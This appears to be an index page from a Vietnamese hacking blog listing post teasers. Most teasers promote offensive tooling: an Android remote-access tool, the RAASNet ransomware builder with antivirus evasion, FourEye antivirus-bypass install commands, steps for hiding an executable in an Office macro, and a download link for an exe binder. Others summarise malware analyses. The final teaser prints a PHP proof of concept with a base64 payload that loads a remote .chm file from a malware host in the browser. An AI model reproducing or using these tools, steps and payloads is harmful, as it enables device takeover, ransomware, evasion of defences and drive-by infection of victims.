Các tính năng có trên AIRAVAT Đọc tất cả các tệp của bộ nhớ trong Tải bất kỳ file nào từ thiết bị của nạn nhân xuống máy của bạn Nhận tất cả thông tin hệ thống của thiết bị nạn nhân Truy xuất danh sách các ứng dụng đã cài đặt Truy xuất tin..
Read moreRAASNet có tác dụng gì? RAASNet là một công cụ bằng python giúp bạn tạo ra Ransomeware theo ý muốn, bạn có thể chọn các mã hóa file, nội dung thông báo đến nạn nhân và key giải mã. Đặc điểm: Tạo ransomware Tùy chỉnh giao diện cho ransomeware FUD (bypass antivirus) Hoạt động trên..
Read moreBài viết mang tính chất nghiên cứu Trên Kali linux, mở termial và gõ lệnh dưới đây để cài đặt FourEye git clone https://github.com/lengjibo/FourEye.gitcd FourEyepip install -r requirements.txtsudo apt-get install x86_64-w64-mingw32-gccpython3 BypassFramework.py Tại Menu chính, gõ lệnh help để xem cách sử dụng của tool bypass antivirus. Tiếp theo gõ lệnh list để liệt kê các tính năng của tool…
Read more1. Go to github.com/khr0x40sh/MacroShop and download all files. 2. Unzip your archive and open cmd. 3. Go to files directory via cmd and write “python exeinvba.py –exe test.exe –out test.vb” (test.exe is your file executed when macro starts). 4. Open new generated test.vb via notepad and copy all this code. 5. You can use this..
Read more
Ứng dụng nhỏ giúp người dùng sử dụng sức mạnh của VirusTotal Scan để nhanh chóng kiểm tra tính an toàn của liên kết Download bằng dòng lệnh. Như đã biết, VirusTotal Scan là một ứng dụng web vô cùng hữu ích giúp người dùng quét virus trực tuyến với 40 công cụ cùng lúc…
Read morecode virut auto it của site congthinh.com vẫn là autoit như mọi lần… nhưng lần này có thêm 1 số file mới extract ra file .jpg đổi đuôi thành .zip và extract 1 lần nữa pass: 123456 Các file extract ra: apps.dat inst.dat mc.dat pk.bin rinst.exe titles.dat vinh.exe Xinh.exe Xinhhk.dll
Read moreTên virus : SafeSys Loại : autorun, lây file Mức độ : nguy hiểm Khuyến cáo : khi sử dụng máy ảo để chạy thử virus phải tắt hết những đường share với máy thật -> ko khéo máy thật dính thì lại càng nguy ! Thông tin thêm : virus có khả năng qua..
Read morelink down (you can login) [hidepost]http://rapidshare.com/files/158400909/exebinder2.5.rar[/hidepost]
Read more1. Loại malware này khi nhiễm vào máy sẽ tạo key vào Registry ở hive HKLM. Mở rộng với 3 key [OptionalComponents]. Thừa hưởng tính năng SupperHidden của dòng họ [Autorun Virus]
Read moreTạo các process : C:WINDOWSsystem32dllcacheRecycler.{645FF040-5081-101B-9F08-00AA002F954E}svchost.exe Path thật : C:WINDOWSsystem32dllcachesvchost.exe C:WINDOWSsystem32dllcacheRecycler.{645FF040-5081-101B-9F08-00AA002F954E}system.exe Path thật : C:WINDOWSsystem32dllcachesystem.exe C:WINDOWSsystem32dllcacheRecycler.{645FF040-5081-101B-9F08-00AA002F954E}Global.exe Path thật : C:WINDOWSsystem32dllcacheGlobal.exe Các process này cùng chạy và bảo vệ lẫn nhau (Khi bạn Kill 1 process thì các process còn lại sẽ gọi lại process vừa bị Kill)
Read moreBài của Dungcoi * Tên malware: SecretC * Thuộc họ: Secret * Loại: Worm * Xuất xứ : Việt Nam * Kích thước: 112kb (Đã pack), 250kb (Chưa pack) * Mức độ phá hoại: Ko rõ Nguy cơ: Bị KeyLog, mất các thông tin quan trọng như mật khẩu… Do có tính năng tự down..
Read moreBài của DungCoi Nguyên tắc khi phân tích virus : 1. Không tìm cách xóa virus trong hệ thống. Có thể bạn ngạc nhiên về điều này, nhưng thực ra, cái chúng ta muốn thực hiện đó là dừng hoàn toàn virus làm việc, còn việc lưu trữ chúng hoàn toàn là không cần thiết…
Read moreHãng bảo mật Kaspersky cuối tuần qua đã phải lên tiếng kêu gọi sự giúp đỡ của cộng đồng để bẻ khóa cơ chế mã hóa 1024-bit RSA được tin tặc ứng dụng trong phiên bản mới Trojan Gpcode. Một khi con Trojan này đột nhập thành công vào PC nó sẽ ngay lập tức..
Read moreThe following proof of concept was provided by “[email protected]” <[email protected]>: <? function malware() { header(“Content-type: text/html”); header(“Content-Disposition: attachment”); echo base64_decode( ‘PGltZyBkeW5zcmM9Imh0dHA6Ly93d3cubWFsd2FyZS5jb20vbW’. ‘Fsd2FyZS9tYWx3YXJlLmNobSIgd2lkdGg9MSBoZWlnaHQ9MT4N’. ‘Cg0KPFNDUklQVD4NCg0KLy8gNy4wMi4wMiBodHRwOi8vd3d3Lm’. ‘1hbHdhcmUuY29tDQoNCi8vIHlvdSBtYXkgY29uc2lkZXIgd3Jp’. ‘dGluZyBzZXZlcmFsIGxpbmVzDQovLyBpbiBjYXNlIG1hbHdhcm’. ‘UuY2htIGFycml2ZXMgYXMgWzFdIG9yIFsyXSBldGMNCg0KZnVu’. ‘Y3Rpb24gbWFsd2FyZSgpDQp7DQpzPWRvY3VtZW50LlVSTDsNCn’. ‘BhdGg9cy5zdWJzdHIoLTAscy5sYXN0SW5kZXhPZigiXFwiKSk7’. ‘DQpwYXRoPXVuZXNjYXBlKHBhdGgpOw0KZG9jdW1lbnQud3JpdG’. ‘UoJzxGT1JNIG5hbWU9Im1hbHdhcmUiIEFDVElPTj0iamF2YXNj’. ‘cmlwdDp3aW5kb3cuc2hvd0hlbHAoZG9jdW1lbnQuZm9ybXNbMF’. ‘0uZWxlbWVudHNbMF0udmFsdWUpIj4nKTsNCmRvY3VtZW50Lndy’. ‘aXRlKCc8Zm9ybT48aW5wdXQgdHlwZT0iaGlkZGVuIiAgc2l6ZT’. ‘0iNDAiIG1heGxlbmd0aD0iODAiIHZhbHVlPSInK3BhdGgrJ1xc’. ‘bWFsd2FyZVsxXS5jaG0iPjwvZm9ybT4nKTsNCnNldFRpbWVvdX’. ‘QoJ2RvY3VtZW50Lm1hbHdhcmUuc3VibWl0KCknLDEwMDAwKTsN’. ‘CiB9IA0Kc2V0VGltZW91dCgibWFsd2FyZSgpIiwyNTAwKTsgIA’. ‘0KPC9TQ1JJUFQ+DQogDQoNCg==’.”);} { malware(); } PHP ?>
Read more